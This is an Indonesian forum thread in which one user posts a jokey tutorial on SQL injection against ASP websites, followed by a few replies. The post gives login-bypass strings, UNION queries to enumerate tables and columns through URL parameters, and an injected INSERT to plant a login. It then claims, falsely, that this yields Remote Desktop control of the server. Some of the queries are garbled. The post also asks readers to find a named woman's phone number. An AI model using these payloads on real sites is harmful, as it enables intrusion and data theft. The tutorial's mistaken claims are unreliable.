Smada Depok Forum

[4ntc0l0ny]

hehee
ketemu lagi dengan aku
heheheh
sebagian dari kita lebih familiar dengan SQL injection dalam php sekarang eike akan kasih seidkit tutor basic SQL injection di asp
okee
sipakan nomor hp renny
plieess cariin nomer hp renny yahna oktaviana .. dah ga tahan ikzz

oke mulaiii
graakkk....
ciaaaaaaaaaaaaat

pertama kita akan injek dengan posisi first person ekekek
yang dimana perintah sql yang kita jalankan kita tulis di text box web tersebut
ckckck

Code:


login: hi' or 1=1--
pass: hi'or 1=1--


nah masukan perintah diatas pada login form pada web yang akan di attack
sekarang kita lanjut ke bagian menjalankan perintah SQL di url bar dalam browser..

Code:


http://www.rennysayangeky/index.asp?id=hi' or 1=1--


catatan : ente2 bs ganti tulisan "1" dengan "0" dst

heheheh
klo sudah paham kita lanjott....

nah bagaimana mengeluarkan nama table ?
gini2

untuk di textbox :

Code:

UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

untuk di url bar :

Code:

http://www.rennysayangeky/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

ckckck cape juga
xixixixi
nach,,,
sekarang udah dapet nama tablenya ??
sekarang cari column
otreee...

text box:

Code:

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--

url bar:

Code:

http://www.rennysayangeky/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'--

ingett !! tablename = nama tabel yang kita dapet dari cari tabel

oke lanjhutttttttt
nah di bagian ini yang peling penting wt ngeluarin isi data dari tabel tsb

text box:

Code:

UNION SELECT TOP 1 table_name FROM column_name--

url bar :

Code:

http://www.rennysayangeky/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name--

ingaaaaaaaattt !!!!
ingatttt
ganti tulisan "table_name" samsa "column_name" sesuai dengan data yang lo dapet tadi
misalna tablename renny terus column_name eky
gini

Code:

http://www.rennysayangeky/index.asp?id=10 UNION SELECT TOP 1 renny FROM eky--

clear ??
nah
gimana kalo kita lebih jauh lagi ngobok2nya
kekeke
denger kata asp kita jadi inget sama sesuatu...
kata itulah "WINDOWS" akakka
hmm....
dengan celah SQL injection ini kita bahkan dapat mengendalikan komputer servernya dengan tampilan grafis
ahahhaha

gini caranya...

text box:

Code:

INSERT INTO 'table_name'('login_id','login_name','password') VALUES (123,eky,renny)--

url bar

Code:

http://www.rennysayangeky.com/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (123,eky,renny)--

nah
values bs lw ganti sesuai dengan keinginan
wkwkwk

lanjot kita konek pake remote desktop connection
semisal kita mau connect ke serper www.rennysayangeky.com
ketiklah di input komputer
lalu
masukan username dan password yang udah lw buat
berarti

please enter password for www.ekysayangrenny.com
username : eky
password : renny
okeee

hihihihihi
aduh sorry klo salah...
baru belajar posting neee..
ampunn..
ikss

muach

[Gt_portnoy]

wiw nice. .gud. .

[4ntc0l0ny]

hehehhe..
cuman asal2an aja kok
iseng dari pada ga nulis ikzz

[ichihara]

om om nama tabel mksudnya apa tuch asli ane binun!!!
mohon pencerahaannya wlalalalalalala!!!!

[4ntc0l0ny]

tabel name
column name
kayak di ms excel aja

[fullyalive]

wah ebad..

tapi aku binun nih kk..

bentar tanya mamah dulu yah..

[4ntc0l0ny]

weks...
momo mamahnya hacker........
ampunnnnnnnnnnnnnn